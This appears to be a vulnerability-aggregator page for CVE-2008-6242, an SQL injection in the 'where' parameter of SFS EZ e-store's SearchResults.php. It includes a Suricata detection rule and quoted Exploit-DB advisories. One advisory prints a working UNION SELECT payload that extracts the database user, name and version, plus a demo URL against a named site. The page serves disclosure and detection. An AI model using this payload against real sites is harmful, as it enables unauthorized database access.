CVE-2008-6242
published 2009-02-23CVE-2008-6242: SQL injection vulnerability in SearchResults.php in Scripts For Sites (SFS) EZ e-store allows remote attackers to execute arbitrary SQL commands via the where…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.98%
57.8th percentile
SQL injection vulnerability in SearchResults.php in Scripts For Sites (SFS) EZ e-store allows remote attackers to execute arbitrary SQL commands via the where parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection
suricata·2010-07-30·CVSS 7.5
CVE-2008-6242 [HIGH] ET WEB_SPECIFIC_APPS Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection
ET WEB_SPECIFIC_APPS Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/SearchResults.php?"; nocase; content:"where="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; pcre:"/UNION.+SELECT/i"; reference:cve,CVE-2008-6242; reference:bugtraq,32039; reference:url,milw0rm.com/exploits/6922; classtype:web-application-attack; sid:2009727; rev:7; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2024
Exploit-DB
E-Store - SQL Injection
exploitdb·2009-12-11
CVE-2008-6242 E-Store - SQL Injection
E-Store - SQL Injection
---
E-Store SQL Injection Vulnerability
Name E-Store
Vendor http://www.getaphpsite.com
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2009-09-03
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
VI. DISCLOSURE TIMELINE
I. ABOUT THE APPLICATION
E-Store is a commercial PHP e-commerce.
II. DESCRIPTION
This application presents a SQL Injection bug.
III. ANALYSIS
Summary:
A) SQL Injection
A) SQL Injection
The GET where parameter passed to SearchResults.php has not
properly sanitised. Because of the affected query, the Magic
Quotes GPC flag (php.in) may be on.
IV. SAMPLE CODE
http://site/path/SearchResults.php?SearchTerm=&where=ItemNam
Exploit-DB
SFS EZ Webstore - 'where' SQL Injection
exploitdb·2008-11-01
CVE-2008-6242 SFS EZ Webstore - 'where' SQL Injection
SFS EZ Webstore - 'where' SQL Injection
---
[~] SFS EZ WEBSTORE remote sql inj
[~]
[~] SearchResults.php (where)
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 01.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------
Exploit:
http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
[SQL]=
ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
demo
http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(
No writeups or analysis indexed.
http://secunia.com/advisories/32525http://www.securityfocus.com/bid/32039https://exchange.xforce.ibmcloud.com/vulnerabilities/46273https://www.exploit-db.com/exploits/6922http://secunia.com/advisories/32525http://www.securityfocus.com/bid/32039https://exchange.xforce.ibmcloud.com/vulnerabilities/46273https://www.exploit-db.com/exploits/6922
2009-02-23
Published